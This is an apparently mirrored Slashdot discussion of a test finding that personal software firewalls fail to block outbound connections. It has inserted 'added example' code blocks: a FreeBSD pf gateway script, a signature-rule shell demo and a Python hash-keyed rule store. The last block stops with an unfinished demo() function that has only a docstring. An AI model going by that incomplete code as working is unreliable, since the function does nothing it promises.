Slashdot Mirror


Personal Firewalls Mostly Useless, Says Mail & Guardian

hweimer writes "More and more security researchers come to the conclusion that personal firewalls are ineffective in controlling outbound traffic. An article in the Mail & Guardian online mentions a test that 'showed that the software often causes more problems than it solves. Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.' Simple PoCs are available, too."

67 of 303 comments

  1. misleading headline by macadamia_harold · · Score: 5, Informative

    More and more security researchers come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.

    The article's about personal software firewalls, not personal hardware firewalls. Furthermore, the fact that personal software firewalls are useless and buggy is not really a new discovery.

    1. Re:misleading headline by iMaple · · Score: 5, Insightful

      Yes, I agree. The title should say "Personal (software) Firewalls Mostly Useless (for outbound traffic)". And that is unpreventable if the user is always logged in as an admin and runs malicious executables (or programs with known security issues, like older versions of browsers). This would be an issue, if a non-admin user could disable the firewall (which I guess is not easy, since the article does not mention that). So there is no real problem with the personal firewall software.

      The firewalls are still very useful in preventing attacks due to OS vulnerabilities (like the Windows RPC issues). Anyway that is the main aim of personal firewalls, and the article does not have anything about the effectiveness of the firewall for inbound traffic.

      If you want a secure outbound firewall the best bet is to use a dedicated gateway machine with the firewall (I use my very old laptop with BSD on it as a gateway).

    2. Re:misleading headline by marrandy · · Score: 5, Insightful

      Talk about stating the obvious...this is the most useless article I have read in a long time.

      1) Web browser and javascript bugs - nothing to do with hardware or software firewalls.

      2) email issues, people going to bad sites etc. - nothing to do with hardware or software firewalls.

      3) People should not run as administrator (or root) - wow, really.

      4) People should stay up-to-date on patches - wow, totally amazingly obvious.

      As you can't control people, they will always do these things. Good software firewalls show-up issues after they have made these mistakes, when rogue software tries to get out.

      They also failed (or I missed it) to mention that software firewalls are good when you have multiple computers behind a hardware firewall - basically an infected computer will be blocked from infecting other computers, e.g. NetBIOS etc.

      Good computer security is a layered concept. From incoming hardware firewalls, IDS, software firewalls on individual computers, user training, security audits etc. I wish people and organizations writing articles would finally learn this. There is no 'magic' one solution.

    3. Re:misleading headline by bytesex · · Score: 4, Insightful

      Software firewalls on the machine itself can do something hardware firewalls can't; they can check to see that the outbound traffic is coming from a trusted application running as an actually logged-on user. Without this option, a firewall must assume that all traffic with destination port 80 or 443 (or 25 or whatever) will be legit, allowing all sorts of malware to pretend to browse while doing their actual nasty stuff. On Windows, a firewall could even check whether the app in question has a window open, which creates an extra check (this visible application is making network connections).

      --
      Religion is what happens when nature strikes and groupthink goes wrong.
    4. Re:misleading headline by Just Some Guy · · Score: 5, Insightful

      Yes, I agree. The title should say "Personal (software) Firewalls Mostly Useless (for outbound traffic)".

      Actually, you forgot to end with ", On Windows". As you probably already know, you can set a BSD system's "securelevel" such that firewall rules, both in kernel and on disk, can't be altered without a reboot. You could hypothetically write a program that patches a BSD machine's boot sequence with one that unprotects the firewall configuration, alters it, changes the backup file so that the user won't get an email notification later on that details the differences, then resumes normal operation - all while hoping that the user or administrator doesn't notice the spontaneous reboot - but there aren't too many of those running around today.

      --
      Dewey, what part of this looks like authorities should be involved?
    5. Re:misleading headline by creepynut · · Score: 2, Interesting

      Now, I didn't RTFA, but it seems the whole point it is trying to make is that software firewalls AREN'T doing just that.

      From the summary:
      Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.'

    6. Re:misleading headline by Pieroxy · · Score: 4, Informative

      I use my very old laptop with BSD on it as a gateway
      For a few bucks, you could buy a small Linksys dedicated box. That box - in addition to doing the job fine - pumps up less power than a laptop will ever do even in its lowest consumption settings. In a few months, the cost of the Linksys box will be recouped on the electric bill. And it is smaller and heats up less.

      My view on the problem at least.

    7. Re:misleading headline by $1uck · · Score: 2, Insightful

      Can you help someone out by pointing me towards a link to a good site that shows how to set something like that up? I've got a bit of experience with Linux and Solaris, but mostly use Windows. I don't have any experience using BSD (though I'd like to look at it). The more complicated my home network gets, the more I want to put something between the modem and the router. I would love to be able to monitor inbound/outbound traffic, block certain sites, etc. I can do some of that with the router, or firewalls on individual machines. I'm sure I can find several sites on Google, but if you've had a good experience with a particular tutorial please share it with me.

    8. Re:misleading headline by sleep-doc · · Score: 2, Informative

      An old laptop running linux can be a terrific gateway, set up by someone with the appropriate knowledge base and experience. Set up by someone without those skills, it's a zombie-in-waiting.

    9. Re:misleading headline by morgan_greywolf · · Score: 2, Insightful

      Right. But they aren't effective in that measure. Joe Sixpack gets a dialog box that says "Application IEXPLORE.exe is attempting to access the Internet" a few thousand times and he just checks "Allow" or, worse "Always Allow" enough times, he doesn't notice when the box says "Application I_pwn_j00.exe is attempting to access the Internet" so, again, he clicks "Always Allow" just like he's always done. Or, he doesn't know what I_pwn_j00.exe is, but that's what he needs to click in order to continue, so that's what he does.

      Plus, as the article states, most of these software firewalls allow stuff to get through without popping anything up, and some malware can even bypass the software firewall, as shown in the PoC.

      IOW, personal firewalls are not only bad because stuff can get through, either through ignorance, buggy firewall software, or through crafty malware that gets past it, but they're also dangerous in that they create a false sense of security.

      The best ways to truly avoid malware are to not download untrusted/unknown software, to use alternatives that are more secure (Firefox vs. IE, gaim vs. AIM, Thunderbird vs. Outlook, etc.), to disable macros in Microsoft Office, and to run good antivirus and anti-malware applications. Alternatively, one could use a platform that is less susceptible to malware, such as Mac OS X, Linux, or *BSD.

    10. Re:misleading headline by value_added · · Score: 3, Informative

      Can you help someone out by pointing me towards a link to a good site that shows how to set something like that up? I've got a bit of experience with Linux and Solaris, but mostly use Windows. I don't have any experience using BSD ...

      I'll offer a suggestion. Install FreeBSD on any old computer with two NICs. You'll find the installation as easy as any Linux system, the routine maintenance probably easier, and the documentation far superior.

      Sit down to read the pf FAQ on OpenBSD's site. It's well written and comprehensive so read from the first page to the last page. Make some coffee and then read it again.

      # cd /usr/ports/shells/bash && make install
      # echo 'pf_enable="YES"' >> /etc/rc.conf
      # echo 'pf_rules="/etc/pf.conf"' >> /etc/rc.conf

      Edit /etc/pf.conf using the home user scenario provided at the end of the 'pf FAQ'. Reboot and you're good to go.

      You'll find pf far less verbose than iptables, ipfw, etc., and easier to learn and to use for that reason among others. There's also lots of additional tools available for pf that will help as well.

      $ cd /usr/ports && make search name=pf | less

      Google for all the rest.

      A final comment. Using this approach gives you a secure firewall with all the unixy goodness you'd expect, not to mention logging, SSH, NTP synchronisation, etc that you may want to use as well. And earning the right to sneer at everyone using those plastic Linksys NAT boxes doesn't hurt.
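      The gateway setup described above, worked through as an added example; this is not code from the comment, from FreeBSD, or from the pf FAQ. The script writes a two-NIC home-gateway pf.conf of the kind the FAQ's home user scenario describes (default deny inbound on the outside, NAT for the LAN, stateful pass outbound) and adds the rc.conf lines that enable pf. The interface names em0/em1, the LAN 192.168.1.0/24 and the temporary paths used by the demo are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original comment or of the pf FAQ: a small
# provisioning script for a FreeBSD home gateway with two NICs. Interface names
# em0/em1, the LAN 192.168.1.0/24 and the file paths are assumptions.
set -eu

# gen_pf_conf EXT_IF INT_IF LAN_CIDR: print the ruleset to stdout.
# pf.conf sections must appear in this order: macros, options, normalisation,
# translation (nat), then filter rules. Filter rules are last-match-wins.
gen_pf_conf() {
    cat <<EOF
# home gateway ruleset (generated)
ext_if = "$1"
int_if = "$2"
lan    = "$3"

# options: never filter loopback
set skip on lo0

# normalisation: reassemble fragments, drop oddly formed packets
scrub in all

# translation: masquerade LAN hosts behind the external address
nat on \$ext_if from \$lan to any -> (\$ext_if)

# filter: deny everything first, logging what the outside sends us
block in log all
block out all

# the LAN side is trusted; keep state so replies are matched automatically
pass in  on \$int_if from \$lan to any keep state
pass out on \$int_if from any to \$lan keep state

# our own and NATed outbound traffic, stateful; nothing listens to the outside
pass out on \$ext_if proto { tcp udp icmp } all keep state
EOF
}

# enable_pf_in_rc RC_FILE: add the rc.conf variables once (idempotent).
# pflog_enable makes the "log" keyword above produce pflog output.
enable_pf_in_rc() {
    rc=$1
    [ -f "$rc" ] || : > "$rc"
    for line in 'pf_enable="YES"' 'pf_rules="/etc/pf.conf"' 'pflog_enable="YES"'; do
        grep -qxF "$line" "$rc" || printf '%s\n' "$line" >> "$rc"
    done
}

# install_gateway EXT_IF INT_IF LAN_CIDR PF_CONF RC_FILE: write both files and,
# where pfctl exists, syntax-check the ruleset without loading it (-n).
install_gateway() {
    gen_pf_conf "$1" "$2" "$3" > "$4"
    enable_pf_in_rc "$5"
    if command -v pfctl >/dev/null 2>&1; then
        pfctl -nf "$4"
    fi
}

# Real use on the gateway (FreeBSD default paths), then reboot or pfctl -ef:
#   install_gateway em0 em1 192.168.1.0/24 /etc/pf.conf /etc/rc.conf
# The demo below writes to temporary files so it can be run anywhere.
if [ "${1:-}" = "--demo" ]; then
    tmp=${TMPDIR:-/tmp}/pfgw.$$
    mkdir -p "$tmp"
    install_gateway em0 em1 192.168.1.0/24 "$tmp/pf.conf" "$tmp/rc.conf"
    cat "$tmp/pf.conf" "$tmp/rc.conf"
    rm -r "$tmp"
fi
```

      Run it with --demo to see the generated files; on the real gateway, pfctl -nf /etc/pf.conf parses the ruleset without loading it, which is the check to run before the reboot the comment mentions.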

    11. Re:misleading headline by Just Some Guy · · Score: 2, Insightful
      For a few bucks, you could buy a small linksys dedicated box.

      The one major problem is that he'd no longer be running BSD. It's not trivial to migrate a working firewall config from one OS to the other, as I painfully re-learned when I replaced my FreeBSD host with a WRT54G. It's more or less equivalent featurewise, but the setup is completely different. I particularly missed the PF (BSD firewall) configuration, which is as close as such things can get to being considered beautiful.

      --
      Dewey, what part of this looks like authorities should be involved?
    12. Re:misleading headline by Dan Farina · · Score: 2, Insightful

      Except that the Linksys (Broadcom based, really) NAT boxes consume less power and can perform all of the above in similar. Keep in mind that these devices have a 200 MHz ARM processor and 16 MB of RAM, and so are better than many computers that at one time ran BSD, consume less power, and have smaller footprint.

      If you insist on having more storage to install programs, one can always use a network mount.

      In any case, there's nothing to sneer at about these little devices.

    13. Re:misleading headline by dgatwood · · Score: 4, Interesting

      It also makes dynamic loading and unloading of device drivers impossible, which is why it doesn't make any sense for a desktop system. Security can only be achieved through properly granting permission, not through outright avoiding granting permission. A scheme that is too restrictive will simply get turned off or worked around by the end users, and thus is not particularly useful, and indeed may actually be harmful to security because of developers making security assumptions that are no longer valid in such a situation.

      Want to really improve security? Create multiple separate privilege sets in the kernel instead of a single "root". Make different executables setuid to a user with privilege sets that allow certain operations. Your kernel extension loader has sufficient privileges to load a kernel extension, but still can't write directly to kernel memory or listen on low numbered ports or access raw devices or bypass filesystem permissions. Your software that requires the ability to listen on low numbered ports doesn't get permission to bypass filesystem permissions or load kernel extensions. And so on.

      Don't get me wrong, it's perfectly okay to have a "root" user, but no executable should ever be setuid root in such a scheme, and that root user should only be used for very limited administrative tasks.

      --

      Check out my sci-fi/humor trilogy at PatriotsBooks.

  2. Told you so by growse · · Score: 4, Interesting

    Well, that's what happens when you try and introduce a complex topic like network security into the consumer market, and subsequently fail at that task. They (the software manufacturers) fail not only in raising a suitable amount of awareness (if every single computer on the planet was behind a firewall, how many worms/malware would this stop?), but they also fail to do the job properly (not blocking outbound traffic) for those who do install their software.

    --
    There is nothing interesting going on at my blog
    1. Re:Told you so by lightyear4 · · Score: 3, Insightful

      Unfortunately, they also create a false sense of security. In my opinion, that is far, far worse.

  3. "Why home firewall software is a leaky dyke" by Anonymous Coward · · Score: 4, Funny

    As a lesbian, I must protest to this offensive and disparaging comment.

    1. Re:"Why home firewall software is a leaky dyke" by ArsenneLupin · · Score: 2, Funny

      You forgot to add closeted, anonymous cowardess, you! ;-)

    2. Re:"Why home firewall software is a leaky dyke" by ArsenneLupin · · Score: 2, Funny
      Yet the fact that she has boobies makes nerds in basements around the world drop their swords and wet their pants. To summarize, she's invincible.

      Not really. That's where the gay nerd comes into play, hehe ;-)

  4. Outbound Traffic? by parasonic · · Score: 5, Insightful

    Yes, they may be ineffective in controlling outbound traffic. However, that's not the real point of a personal firewall.

    Without a personal firewall, users have a huge issue with inbound traffic when it comes to security, especially in the Windows "territories." I'll never forget the day that I left open an unpatched WinXP box after a fresh install. I watched all of the script kiddies and automated worms go at it from my passive OpenBSD monitoring box. That machine was hacked in under ten minutes just because I left it there, open to the Internet. So, useless? No.

    1. Re:Outbound Traffic? by grub · · Score: 2, Informative


      You could have put that OpenBSD box inline as a firewall (pf is cool) and still done monitoring. Then your XP box would have been safe.

      --
      Trolling is a art,
    2. Re:Outbound Traffic? by grub · · Score: 2, Insightful

      Oh bah... Colour me "stupid" today. :)

      --
      Trolling is a art,
    3. Re:Outbound Traffic? by SCHecklerX · · Score: 2, Interesting
      This is why, when we were looking for PFW solutions, we settled on using the one built into XP SP2 and above.

      Why?

      Yeah, it'd be nice to stop the stupid user stuff with outbound attacks and such... but most of that threat is better mitigated through the use of malcode-analyzing proxies and other filtering systems (we quarantine email attachments, haven't had a 0-day in years, use centralized ad and malcode blocking for web browsers, etc).

      The REAL threat that we could actually get benefit from using PFW software on was for inbound traffic (ie WORMS). We tested many PFW applications in our labs, and many of them were horrible (They didn't even begin blocking until the user logged in, they opened listening ports for their own management, etc). We found that the firewall bundled with XP SP2, however, is actually a very good product. It is up on boot, DROPS rather than rejects packets, is controllable via scripting, and has good logging. The problem, as always, is in allowing our staff to administer windoze clients remotely. This requires certain ports be opened.

      The easiest tradeoff (and we remain worm-free) was to simply block all inbound ports unless the client is connected to a trusted corporate network (in which case we open them all up again). This is done through some Active Directory probing during initialization scripting and also on interface up/down changes. It works very well.

      It's not perfect, nor is it the most uber-super secure solution (a user could theoretically bypass our default wireless configuration to bridge while connected to a trusted wired network since our windows AD guy doesn't know a way to dynamically block with the firewall per interface -- it's a risk covered by our security policies which we don't mind). But it does what we need it to do, provides adequate security, and does not disrupt business.

      Here are the requirements that we had going into our testing, and the XP SP2 firewall did a very good job at addressing them:

      1. If loaded with no policy, default policy is deny all inbound traffic
      2. Firewall must be in place on system boot before the launch of any other network services, and prior to user login
      3. When connected to untrusted network, policy is deny all inbound
      4. When connected to trusted network, policy is allow all
      5. When connected to trusted network via IPSec tunnel, policy is allow all
      6. Must be centrally managed, integrated with existing management if possible
      7. Must be easily mass deployable by desktop services staff
      8. Must meet ICSA Labs PC Firewalls Certification Criteria

  5. If it's in it's already too late by El Cubano · · Score: 4, Insightful

    Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.

    First, nothing is perfect. Second, if some nasty program/spyware/adware got in, then it's too late already. The best thing is to prevent them getting in to begin with. Besides, most people don't know the difference between what should and should not be allowed to have access. I do some tech support for friends and family and it really gets annoying after the fifteenth call, "Should I let FooBar21.exe access to the Internet?" I finally went with the policy of disabling any sort of outbound filtering in whatever firewall I set up for people I will be "supporting."

    1. Re:If it's in it's already too late by voice_of_all_reason · · Score: 3, Informative

      You could also advise them to simply google the .exe file. Every time I've tried this, the first 10 results have always been a group of sites that detail exactly what it's from and a recommendation to allow it or not. Give a man a fish/teach a man to fish and all.

      Sure it takes more time, but the only real reason I even use a firewall is to keep winamp and media player from phoning home.

  6. Annoyance by damaki · · Score: 4, Interesting

    Personal firewalls do not block outbound connections because it is a pain in the ass to decide what can pass or not. I mean, did you ever try some Windows firewall that allows that? You get hundreds of warnings from obscure services trying to send unknown data to somewhere you do not want to know. Users are clueless about it; they will just check the box that says "shut up and hack my box" if it prevents further messages from appearing.

    --
    Stupidity is the root of all evil.
  7. Simple by The Cisco Kid · · Score: 4, Insightful

    A firewall is a *device* between a device that needs 'protection' (usually a Windows PC), and an Internet connection. Keyword *device*, as in a separate physical piece of equipment. A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. E.g., completely useless. 'Software Firewall' is an oxymoron.

    Not running Windows, but instead running either a proprietary platform or (preferred) something unix-based. The simplest is a simple one-way NAT (outbound connections allowed, inbound connections impossible without a specific, intentional mapping). These of course only protect against active outside attacks, and not against trojan/virus emails or websites visited from the PC. The most effective method of avoiding those is to avoid use of and remove (to the extent possible) all Microsoft email clients and web browsers from the PC.

  8. ZoneAlarm? by CyberZCat · · Score: 5, Informative

    Did they test ZoneAlarm? Because even with my best efforts to circumvent it (for testing), it's still able to block everything. Even as an Admin user, it's not possible to stop the service unless you "officially" exit the program. I've been using it for years, and I haven't once ever had a program that it didn't block (if I chose to block it). Even test software which was specifically meant to try to find holes in personal firewalls. The new version does other handy things too, like keeping an eye on software which tries to monitor your keyboard/mouse (such as keyloggers) and giving you the option to block them from doing that. Very handy.

  9. Which software? by jtroutman · · Score: 2, Interesting

    I'm just curious, since the article doesn't mention it, but which firewalls were tested? I've looked at the website for the magazine that did the testing, but my German is rather rusty and I can't seem to find the original article. The only one mentioned in the article is the Windows XP firewall.

    --
    I stole this sig from a more creative user.
    1. Re:Which software? by Lambticc · · Score: 5, Informative

      _G Data InternetSecurity 2006
      _F-Secure Internet Security 2006
      _Kaspersky Internet Security 6
      _Trend Micro PC-Cillin 14 Internet Security
      _Symantec Norton Internet Security 2006
      _Zonelabs Zonealarm Internet Security 2006
      _McAfee Internet Security Suite 2006
      _Computer Associates eTrust Internet Security Suite r2
      _Panda Platinum Internet Security 2006
      _Softwin Bitdefender 9 Internet Security

      This is all I could find on the German site PC Professionell ... my German is not so good.

  10. Purpose of a personal firewall by Anonymous Coward · · Score: 5, Insightful

    The personal or desktop firewall is not supposed to be your first line of defense, it's supposed to be your last line of defense.

    I recommend that people use both a hardware and software firewall, the hardware firewall protects you from the Internet in general. The software firewall protects you from the other computers on your local network.

    But when it comes down to it, a firewall is as strong as its weakest link, which is almost always the end user. Running as admin while browsing, downloading software from untrusted sources, don't blame the firewall for user stupidity.

  11. They just didn't have enough firewall. by Colin Smith · · Score: 4, Funny

    Most of the "secured" computers I've seen have 3, 4 or more firewalls installed and "working". If one firewall isn't stopping outbound connections, go install another one, you'll be twice as secure then.

    --
    Deleted
  12. Little Snitch by GeffDE · · Score: 2, Informative

    The article (to my view) didn't mention any of the names of the programs, and I don't speak or read German, so I don't know how to find the names.

    But I would swear by a nifty little app (for mac), Little Snitch which does seem to block both outgoing and incoming traffic perfectly.

    --
    It has been a nervous year, with people beginning to feel like Christian Scientists with appendicitis.
    1. Re:Little Snitch by Steve Ballmer's Fat · · Score: 2, Informative

      I would second the notion that Little Snitch is fantastic! However, it should be pointed out that Snitch does NOT block incoming traffic, and it is not intended to.

  13. Re:Blocking outbound connections silly by grub · · Score: 2, Informative


    Blocking outbound traffic has been very useful for spanking people who think running Kazaa/eMule/BitTorrent/etc. at work is a good idea. Or for blocking access to outgoing SMTP so users have to use the corporate mail box, etc.

    --
    Trolling is a art,
  14. Little Snitch for Mac OS X by toupsie · · Score: 3, Informative

    Mac users, don't think you are safe because you aren't running Windows. It's amazing the number of apps that "phone home". A great tool for Mac OS X egress filtering is Little Snitch. It's cheap and easy to use.

    --
    Strange women lying in ponds distributing swords is no basis for a system of government.
  15. Bad article, no donut by Chairboy · · Score: 3, Informative

    The article makes a number of critical errors that impact its credibility.

    The article expounds on the dangers of Javascript, but fails to mention ActiveX. I suspect the author had heard about "scripting" being a security hole and assumed incorrectly that the other person was talking about Javascript. JS is inconsequential compared to ActiveX when it comes to actual risk.

    Additionally, when it claims that AV software essentially supersedes any firewall in terms of protection, it fails to consider the security nightmares in Windows. Specifically, through the trust relationships, you can modify registry settings and execute code on computers without your viral code ever touching the disk on the machine by doing it remotely from another computer. Because memory scanning is essentially ineffective, modern AV programs cannot effectively protect against this, which is why most security companies suggest combining AV with a Firewall. Plus, there are regular buffer overflow exploits that have the same effect: Code running without touching the disk. Where do they come from? Over the wire. Code Red and Nimda are good examples of attacks that were stopped by even the most basic firewalls. Safe browsing had no effect whatsoever on whether a user was infected.

    Finally, the article fails to take into consideration the thought that goes into the automatic rule creation most firewalls come with now. Developers understand that users demand convenience and security, and work to find a good match of both. To this effect, most modern desktop firewalls will use signature based rules (so that a malicious program has to do more than just be named after a trusted program) to create a basic rule that allows that program outbound access. The ports are not being just "left open" willy nilly, they are connected to known programs and watched. Some firewall programs even watch for threadjacking malware that would inject itself directly into trusted programs, that gives even more protection.

    The author of the article should reevaluate his or her knowledge of internet security. It is likely that the increasing ease of use has been interpreted as a drop in protection, but this is not the case. A secure system is one that uses a heterogeneous mix of disk and network protection.
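    The "signature based rules" described above, shown as an added example that is not code from any firewall product or from the comment: a rule created from the program's name alone trusts anything called iexplore.exe, while a rule that records a fingerprint of the executable's contents only matches the program it was learned from. The file names, file contents and the rule-database format are constructed for the demo, and cksum(1) stands in for the cryptographic hash a real product would use.

```shell
#!/bin/sh
# Added example (not from the original comment or any product): a toy model of
# signature-based outbound rules. Files, contents and the rule database are
# constructed for the demo; cksum(1) stands in for a cryptographic hash.
set -eu

# fingerprint FILE: checksum of the file's contents (CRC via cksum).
fingerprint() {
    cksum "$1" | cut -d' ' -f1
}

# learn_rule DB FILE: automatic rule creation at first allow. The rule binds
# the program's basename to its fingerprint, one "name checksum" line.
learn_rule() {
    printf '%s %s\n' "${2##*/}" "$(fingerprint "$2")" >> "$1"
}

# check_outbound DB FILE: decision for a program that wants to connect.
#   prompt  no rule for this name yet, so the user is asked
#   allow   a rule exists and the contents match the recorded fingerprint
#   deny    a rule exists but the contents differ: a program merely named
#           after a trusted one does not inherit its permission
check_outbound() {
    db=$1; file=$2; name=${file##*/}
    expected=$(awk -v n="$name" '$1 == n { print $2; exit }' "$db")
    if [ -z "$expected" ]; then
        echo prompt
    elif [ "$expected" = "$(fingerprint "$file")" ]; then
        echo allow
    else
        echo deny
    fi
}

# Demo with constructed files: a "genuine" browser and an impostor carrying
# the same name in another directory.
demo() {
    d=${TMPDIR:-/tmp}/pfwsig.$$
    mkdir -p "$d/real" "$d/fake"
    printf 'genuine browser binary\n' > "$d/real/iexplore.exe"
    printf 'something else entirely\n' > "$d/fake/iexplore.exe"
    db=$d/rules.db; : > "$db"
    echo "before any rule:           $(check_outbound "$db" "$d/real/iexplore.exe")"  # prompt
    learn_rule "$db" "$d/real/iexplore.exe"
    echo "trusted program:           $(check_outbound "$db" "$d/real/iexplore.exe")"  # allow
    echo "same name, other contents: $(check_outbound "$db" "$d/fake/iexplore.exe")"  # deny
    rm -r "$d"
}

if [ "${1:-}" = "--demo" ]; then
    demo
fi
```

    Run it with --demo. The deny result is the point the comment makes: the rule is keyed on what the executable is, not what it is called, so after an update changes the binary (the Firefox case another commenter describes) the fingerprint no longer matches and the user is asked again.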

  16. Result of Fundamental Flaw by JBHarris · · Score: 3, Insightful

    A fundamental concept in computing nowadays is that software designers attempt to do as much thinking for the end user as possible. This is a generally good thing, as the easier/more-intuitive software is to use, the more people will use it. That point aside, this can be a negative thing as it keeps users from needing to understand what they are actually doing. Using computers NEEDS at least a basic understanding of what's going on.

    I don't mean everyone should study the TCP/IP stack and fully grasp ports and such, but seriously....you can't just show someone what a car does & explain the controls and then expect them to be able to drive properly & safely. It takes training & study.

    The same is true with computers. I'm not suggesting an 'internet license' or anything, but I would recommend that high school core classes at least provide the basics of the underlying fundamentals of computing. Until someone understands what those firewalls are for, they will never reach a truly useful state.

    Brad

  17. Question by geeber · · Score: 3, Interesting

    So if I have a hardware firewall in my router is a software firewall useful as a last ditch defense? Or is it nothing more than an annoyance and resource hog?

    1. Re:Question by legoburner · · Score: 4, Informative

      Although they do not provide much benefit, it can sometimes be worth it, especially if you have a wireless network behind your firewall. One rogue worm-ridden computer on your wireless network and bad things can happen to all your machines. Having a software firewall will consume resources and might annoy you from time to time, but will reduce the chance of infection from common worms. You should never presume your internal network is secure unless you can completely verify every last bit that comes into it.

    2. Re:Question by SCHecklerX · · Score: 5, Interesting

      Software firewalls 'solve' the same problem as antivirus software. They attempt to disallow stupid users from doing stupid things. For the most part, if people don't install unknown/untrusted software on their PCs, and use safer alternatives for online stuff (gaim, firefox, sylpheed vs. aol's own messenger, MSIE, Outlook) along with practicing safe online computing in general, personal firewalls add the same value as antivirus software. None.

      For a skilled user (which these aren't marketed to anyway), there is value in analyzing what your software is trying to open outbound connections to, if you tell your PFW to alert you. In the hands of a skilled user, this is good information and the PFW is a good tool to analyze what software you may want to ditch or restrict. Again, this isn't the demographic most PFW vendors market to. You can't use a tool like this without a basic knowledge of how TCP/IP works. Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

    3. Re:Question by SCHecklerX · · Score: 2, Insightful

      The concepts involved (port/protocol/subnet/hostname/client/server, etc) have not changed since I have been playing starting around 1994. Yes, it will change when IPV6 is adopted, but we ALL have some learning to do when that occurs.

    4. Re:Question by 99BottlesOfBeerInMyF · · Score: 3, Insightful

      Software firewalls 'solve' the same problem as antivirus software. They attempt to disallow stupid users from doing stupid things.

      I disagree. Software firewalls on Windows attempt (and usually fail) to add granularity of control for end users.

      For the most part, if people don't install unknown/untrusted software on their PCs, and use safer alternatives for online stuff (gaim, firefox, sylpheed vs. aol's own messenger, MSIE, Outlook) along with practicing safe online computing in general, personal firewalls add the same value as antivirus software. None.

      This depends a whole lot upon your definition of "trusted." In any case, this is just another example of tools being designed without taking users into account. For most users the point of a computer is to run software they want. They don't know what software is secure and I'd argue no one does as everyone has to trust others. I don't know if Firefox has a backdoor that will be enabled next week. I haven't audited all the code. I doubt you have either. Whether it is Firefox, some shareware, an executable some friend sent via IM, or just something the user thought was data but the extension was hidden on, users who don't run untrusted data are missing a huge portion of the functionality they want from their computer. More important yet, they expect that functionality. It is not that they are stupid, they just have reasonable expectations that are not being met.

For example, most users never want any programs except their e-mail client to be able to read their e-mail address book. I mean what kind of stupid machine would let "nekkid_pics.jpg(.exe)" read my friends' e-mail addresses and send a whole bunch of e-mail to them without asking me first? Who wants their computer to do that? And yet, almost all modern OSes just let any old program, or program disguised as data, do absolutely anything they want without asking the user or even informing them. That is what is stupid.

      Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

      If I drive poorly, a bunch of kids could get run down and killed by a ton of metal. If I run random executables someone might get spam e-mail. Perhaps you see how the negative consequences of the former warrant licensing while the latter almost certainly does not?

The real problems are twofold. One, computers are very poorly designed and don't behave as users expect. Two, when computers don't meet people's fairly reasonable expectations and instead are hijacked by spammers, people like you blame the users instead of the crappy OSes. Fix the software first, then if the problem persists you can blame the users.

  18. Re:Blocking outbound connections silly by lightyear4 · · Score: 2, Insightful

    Or for preventing a compromised box from DOSing the rest of the world.

  19. Which Six? by 140Mandak262Jamuna · · Score: 3, Informative

Could not find the list of the six software packages tested. Don't know if ZoneAlarm was tested and found to be defective too. But I would be surprised. Every time I update Firefox, ZoneAlarm knows that the exe file has changed and alerts me to renew permission for it to connect to the internet.

    --
    sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
  20. No kidding... I've found them useless in practice by RebornData · · Score: 3, Informative

    The issue with most desktop software firewalls that attempt to control outbound connections is that they have no idea in advance what constitutes a valid program and what doesn't. So they ask the user, who in most cases is unable to answer the question. The only information typically provided is the executable name, and in many cases it's a generic one (like svchost.exe) that leaves even an experienced user without the ability to make an informed decision.

    The problem is that this trains users to ignore the prompts and habitually click "allow" or "deny" (usually because they find out the hard way that stuff breaks when they click "deny"). The result is far worse than if there were no attempts to control outbound access, because most of these firewalls (Zonealarm in particular) use similar techniques for *inbound* traffic too... they will prompt the user when a program opens a listening port, and if they hit "allow" will enable global inbound traffic to that port, creating a hole that otherwise wouldn't have been there.

This happens regularly in practice; I've seen it over and over again with my small business consulting clients. Although technically an outbound software firewall with program control could be a good last-ditch effort to block malware that has managed to get installed and running, on a practical basis they cause more problems than they solve.

    -R
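Comments 19 and 20 describe the two halves of the same problem: a rule keyed on a file name (ZoneAlarm noticing that firefox.exe changed after an update is the desirable behaviour; a prompt that says only "svchost.exe wants out" is the useless one). The following is an added example, not code from ZoneAlarm or any other product discussed here, of how a personal firewall's rule store can key decisions on the executable's SHA-256 plus a context tag instead of on the name, and keep "may connect out" separate from "may listen". The executables, hashes, addresses and the service name "wuauserv" are constructed for the demo; the hash-keying approach is this example's design choice, not a claim about how any named product works.

```python
"""Application rules keyed on executable hash, not file name (added example).

Simulates a personal firewall rule store. A rule is stored under
(sha256 of the binary, context tag, listening?) so that:
  - a replaced or updated binary no longer matches and re-prompts;
  - a generic host (svchost.exe) without a context tag is never decidable;
  - an "allow" for outbound does not silently become an "allow" for listening.
All files and events below are constructed for the demo.
"""
import hashlib
import os
import tempfile
from dataclasses import dataclass, field

# Host processes whose name alone says nothing about who wants the connection.
GENERIC_HOSTS = {"svchost.exe", "rundll32.exe", "dllhost.exe"}

ALLOW, DENY, PROMPT = "allow", "deny", "prompt"


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


@dataclass
class ConnEvent:
    exe_path: str
    remote: str               # "host:port" (outbound) or "addr:port" being bound
    listening: bool = False   # True when the process opens a listening socket
    context: str = ""         # e.g. hosted service name for svchost-style hosts


@dataclass
class RuleStore:
    # (sha256, context, listening) -> decision
    rules: dict = field(default_factory=dict)

    def _key(self, ev: ConnEvent):
        return (sha256_of(ev.exe_path), ev.context, ev.listening)

    def remember(self, ev: ConnEvent, decision: str) -> None:
        """What the firewall stores when the user ticks 'remember this setting'."""
        self.rules[self._key(ev)] = decision

    def decide(self, ev: ConnEvent) -> str:
        name = os.path.basename(ev.exe_path).lower()
        if name in GENERIC_HOSTS and not ev.context:
            # Comment 20's point: "svchost.exe wants out" cannot be answered.
            return PROMPT
        return self.rules.get(self._key(ev), PROMPT)


def demo() -> dict:
    """Trust a binary, replace its contents, and watch the stored rule lapse."""
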